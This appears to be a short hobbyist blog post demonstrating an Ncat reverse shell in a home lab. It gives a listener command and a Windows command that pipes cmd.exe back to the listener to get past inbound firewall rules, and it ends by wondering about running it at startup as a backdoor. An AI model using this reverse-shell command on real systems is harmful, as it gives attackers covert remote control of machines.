This will probably be my last Ncat post for now as I really must get on with other things. If you want a comprehensive Ncat tutorial then hop over to IronGeek. Ncat really is a superb tool.
Previous posts have focussed on connecting to Ncat on a remote machine, and although that is great fun, in the real world an inbound connection to the target would most likely be blocked by a firewall. One way around this is a reverse shell, in which the target machine reaches out to us instead: outbound connections are generally far less tightly regulated than inbound ones.
First we set up the Ncat listener on my machine (IP 192.168.1.70):
:~# ncat -l 8008 <– Listen on port 8008
Then the reverse shell on the target Windows machine:
C:\Documents and Settings\Lab1> ncat 192.168.1.70 8008 -e cmd <– Connect to IP 192.168.1.70 on port 8008 and execute command shell
Result on my machine:
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Lab1>
Job done.
I wonder if it is possible to have Ncat run a reverse shell on startup similar to the backdoor example I blogged?